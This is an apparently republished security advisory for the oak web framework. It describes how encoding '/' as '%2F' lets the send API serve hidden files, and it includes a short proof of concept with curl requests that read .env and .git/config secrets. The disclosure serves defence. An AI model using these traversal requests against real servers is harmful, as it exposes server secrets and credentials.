First published: Fri Nov 01 2024(Updated: )
### Summary By default `oak` does not allow transferring of hidden files with `Context.send` API. However, this can be bypassed by encoding `/` as its URL encoded form `%2F`. ### Details 1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first. 2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`. ### PoC ```ts // server.ts import { Application } from "jsr:@oak/oak@17.1.2"; const app = new Application(); app.use(async (context, next) => { try { await context.send({ root: './root', hidden: false, // default }); } catch { await next(); } }); await app.listen({ port: 8000 }); ``` In terminal: ```bash # setup root directory mkdir root/.git echo SECRET_KEY=oops > root/.env echo oops > root/.git/config # start server deno run -A server.ts # in another terminal curl -D- http://127.0.0.1:8000/poc%2f../.env curl -D- http://127.0.0.1:8000/poc%2f../.git/config ``` ### Impact For an attacker this has potential to read sensitive user data or to gain access to server secrets.
Affected Software | Affected Version | How to fix |
---|---|---|
npm/@oakserver/oak | <=14.1.0 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.